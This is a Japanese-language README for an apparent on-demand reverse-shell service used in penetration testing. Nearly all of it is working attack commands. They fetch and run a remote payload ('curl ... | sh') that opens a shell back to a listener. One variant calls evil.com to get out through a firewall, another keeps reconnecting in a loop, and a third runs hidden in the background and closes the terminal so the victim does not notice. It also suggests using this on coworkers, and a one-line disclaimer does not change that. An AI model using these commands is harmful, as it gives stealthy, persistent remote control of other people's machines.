
ペネトレーションテスト中にターゲット環境を自動検出し、適切なペイロードを実行してリモートアクセスを提供するオンデマンドリバースシェルサービス。
リバースシェルをサービスとして提供 - https://reverse-shell.sh
覚えやすいリバースシェル。ほとんどのUnix系システムで動作します。
ターゲット上で利用可能なソフトウェアを検出し、適切なペイロードを実行します。
あなたのマシンでポートを開けて待ち受けます。netcatで簡単にできます。
nc -l 1337
ターゲットマシンで、https://reverse-shell.sh/yourip:port の出力をshにパイプします。
curl https://reverse-shell.sh/192.168.0.69:1337 | sh
自分のマシンに戻ると、シェルプロンプトが表示されるはずです。
これはペネトレーションテストや、同僚に常にコンピュータをロックする理由を理解してもらうためのものです。悪意のある目的には使用しないでください。
IPの代わりにホスト名を使用できます。
curl https://reverse-shell.sh/localhost:1337 | sh
これはリバース接続であるため、ファイアウォールを通過してインターネットに接続できます。
evil.comのサーバーで接続を待ち受け、安全なネットワーク内からリバースシェルを取得することもできます。
curl https://reverse-shell.sh/evil.com:1337 | sh
デフォルトでは、シェルが終了すると接続が失われます。無効なコマンドで誤って接続を切ってしまうかもしれません。whileループでラップすることで、再接続を試みるシェルを簡単に作成できます。
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
同僚に対してこれを行う場合は注意してください。彼らがオフィスを離れてもこれが実行されていると、攻撃の対象になります。
リバースシェル接続を維持するには、ターミナルセッションを開いたままにする必要があります。同僚にいたずらをしようとしている場合、それは少し目立つかもしれません。
次のコマンドは、リバースシェルをバックグラウンドプロセスで実行し、ターミナルを終了します。被害者のマシンに怪しいターミナルウィンドウが開かれたままになることはありません。
これを実行する際は、新しいターミナルウィンドウを使用してください。そうしないと、既存のセッションでの作業が失われます。
sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
MIT © Luke Childs